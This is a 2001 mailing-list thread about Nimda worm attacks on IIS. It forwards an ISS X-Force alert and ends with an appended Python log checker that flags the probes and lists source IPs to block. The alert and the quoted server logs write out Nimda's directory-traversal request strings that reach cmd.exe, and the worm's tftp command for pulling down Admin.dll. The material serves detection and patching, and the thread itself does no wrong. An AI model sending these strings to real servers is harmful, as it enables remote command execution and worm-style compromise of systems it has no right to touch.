3) install a product on the IIS servers that performs auto-blocking of the source IP address when Nimda or Code Red I/II is detected
Patrick
>>> LEFEVRE David <[email protected]> 19/09/01 09:09 >>>
I've found this on another mailing list (Xforce)
Internet Security Systems Security Alert
September 18, 2001
Aggressive Propagation of Nimda Worm
Synopsis:
ISS X-Force has captured a new Internet worm, known as Nimda, that contains much of the functionality of Code Red worm and its derivatives. Nimda attempts to identify vulnerable Microsoft IIS servers and deface them, and attempts to infect additional systems. Nimda is potentially more dangerous than Code Red or Code Blue, because it includes a powerful e-mail distribution component. Code Red was limited to infecting Web servers running IIS. Nimda, on the other hand, can infect any Windows system, and then distribute further by emailing copies of itself to individuals in MAPI (Messaging Application Programming Interface) address books, or by identifying and infecting vulnerable IIS servers. This distinction means that there may be millions of infections. Indications of severe network outages related to the massive amount of network traffic this worm generates have already been reported.
Description:
Nimda is vastly different from Code Red in how it propagates. Nimda takes advantage of standard e-mail distribution techniques to broaden the eligible pool of target hosts. Instead of only attacking Web servers with Web server vulnerabilities, Nimda is designed to propagate via spoofed e-mail. The e-mail is spoofed to appear as if it came from trusted sources. Nimda relies on extensive local propagation once a system is infected. It replaces .dll, .eml, .nws files on all shared drives. It also appends itself to all .htm, .html, and .asp files on the infected system. This also allows the worm to spread to remote users when they access Web pages on infected servers.
IIS Scanning and Propagation
Nimda will use several Unicode Web Folder Traversal vulnerability attack strings to probe for vulnerable IIS systems. The attack strings used are as follows:
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe is the backdoor that Code Red II installed on infected servers)
Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack string and inspects output to determine if the target system is vulnerable. If a vulnerable IIS Web server is found, Nimda will append the following command to an attack string to upload a copy of the worm to the vulnerable server:
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
E-mail Propagation
Nimda will read the e-mail address books on the infected system. It will e-mail a copy of itself to each address in the list. The Subject: lines of the e-mails containing the worm will vary.
Backdoor Functionality
Once a computer is infected with Nimda, the worm takes steps to "backdoor" the infected system, by creating accounts that could provide further access to the system by remote attackers. Nimda will create a "guest" account if it doesn't already exist, or activate it if it has been disabled. It will also add the guest user to the "Guests" and "Administrators" groups.
Nimda will also open the "C:" share to the Internet, giving full access to the C: drive of the infected computer. Attackers from anywhere on the Internet may access this share with full read/write access, once this share is opened.
Recommendations:
ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding signature. This signature was included in Network Sensor X-Press Update 3.1 and Server Sensor 6.0.1. RealSecure Network Sensor also detects the Nimda worm with the HTTP_Windows_Executable signature.
ISS BlackICE products will trigger the "2000639 - HTTP UTF8 backtick" and "2002595 - IIS system32 command" events.
ISS Internet Scanner customers can test for this vulnerability using the IisUnicodeTranslation check, which was included in XPU 4.4 (and later updated in XPU 4.8).
ISS System Scanner customers can test for this vulnerability using the MS00-078 check included in XPU 1.13 (#13).
ISS X-Force recommends that all users contact their anti-virus vendor for software updates and Nimda removal information.
Microsoft IIS administrators who have not yet installed the patch for the Web Server Folder Traversal vulnerability are encouraged to do so immediately.
For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
For Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
The Nimda worm takes advantage of well-known security weaknesses in IIS, as well as a general lack of security awareness among Internet users regarding e-mail attachments. ISS recommends that all IIS administrators apply all security patches immediately and follow published Microsoft IIS Security Checklists. Please refer to the links in the Additional Information section.
Additional Information:
ISS X-Force recommends that all Web site administrators review the appropriate IIS Security Checklist from Microsoft, and verify that their IIS Web servers have been configured securely. IIS servers that have been configured securely, using the Checklists, are not vulnerable to many of the recent and widely publicized remote IIS exploits.
The IIS Security Checklists are available at the following locations:
For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp
For Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.asp
Web site administrators are also strongly encouraged to apply the latest IIS cumulative security patch to prevent Web servers from being compromised by this and other IIS exploits. This patch is available from the following Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
About Internet Security Systems (ISS)
Internet Security Systems is a leading global provider of security management solutions for the Internet, protecting digital assets and ensuring safe and uninterrupted e-business. With its industry-leading intrusion detection and vulnerability assessment, remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to more than 8,000 customers worldwide including 21 of the 25 largest U.S. commercial banks and the top 10 U.S. telecommunications companies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call.
Copyright (c) 2001 Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail [email protected] for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
X-Force PGP Key available at:
http://xforce.iss.net/sensitive.php
as well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force [email protected] of Internet Security Systems, Inc.
Best regards,
David
Patrick Coomans wrote:
> Since this evening I am experiencing massive attacks on HTTP (IIS
> oriented I presume) from many different IP addresses. They all look
> like:
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Is anyone aware that this is some new kind of worm? Now my FW1 question:
> can I create a HTTP resource (secure server) that blocks all requests
> that e.g. have a .EXE in it? Or would that slow my FW1's down too
> much? Any other suggestions for good products that can do HTTP content
> inspection and that cooperate or can co-exist with fw1? Thanks, Patrick
--
David LEFEVRE
CARDIF - Architecture et Sécurité Opérationnelle
[email protected] - Tél : 01 41 42 76 63
[email protected] - Tel : 01 41 42 24 22
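The probe requests quoted in this thread, run through a small log checker written as an added example (not code from the thread, from ISS or from any product named above): it canonicalises request paths the way the vulnerable IIS decoder did, so the double-encoded (%255c, %%35%63) and overlong UTF-8 (%c0%af, %c1%9c, %c1%1c) traversal variants collapse to the same plain form, labels the Code Red II root.exe and cmd.exe probes, and lists the source IPs that crossed a hit threshold, which is the auto-blocking decision discussed at the top of the thread. The CLF-style log format, the IP addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter

_HEX = re.compile(r"%([0-9a-fA-F]{2})")

def lenient_percent_decode(path):
    # One %XX pass. A 0xC0/0xC1 lead byte plus one more %XX byte is folded to ASCII
    # as the unpatched IIS decoder did (%c0%af -> '/', %c1%9c and %c1%1c -> '\');
    # a '%' without two hex digits after it stays literal (%%35%63 -> %5c here).
    out, i = [], 0
    while i < len(path):
        m = _HEX.match(path, i)
        if not m:
            out.append(path[i]); i += 1; continue
        b, i = int(m.group(1), 16), m.end()
        if b in (0xC0, 0xC1) and (m2 := _HEX.match(path, i)):
            b, i = ((b & 0x1F) << 6) | (int(m2.group(1), 16) & 0x3F), m2.end()
        out.append(chr(b) if b < 0x80 else "?")
    return "".join(out)

def canonicalize(path):
    # Two passes defeat double encoding (%255c, %252f); '\' is folded to '/'.
    return lenient_percent_decode(lenient_percent_decode(path)).replace("\\", "/").lower()

def classify(path):
    # Label one request path from the thread's probe list; None for other traffic.
    canon = canonicalize(path)
    if "/root.exe" in canon:                 # Code Red II backdoor check
        return "code-red-ii-backdoor"
    if "/winnt/system32/cmd.exe" in canon:   # cmd.exe via traversal or via a mapped C/D share
        return "traversal-to-cmd" if "../" in canon else "share-mapped-cmd"
    return None

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def scan_log(lines, threshold=3):
    # Returns (hits, block_list): labelled probes plus the source IPs that reached
    # the threshold, i.e. the auto-block decision from the thread, taken offline.
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify(m.group(3))):
            hits.append((m.group(1), m.group(3), label)); per_ip[m.group(1)] += 1
    return hits, sorted(ip for ip, n in per_ip.items() if n >= threshold)

SAMPLE_LOG = [  # constructed CLF lines modelled on the requests quoted in the thread
    '192.0.2.10 - - [18/Sep/2001:21:03:12 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:21:03:12 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Sep/2001:21:03:13 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '198.51.100.7 - - [18/Sep/2001:21:04:02 +0200] "GET /index.html HTTP/1.0" 200 1234',
    '198.51.100.7 - - [18/Sep/2001:21:04:05 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
]
```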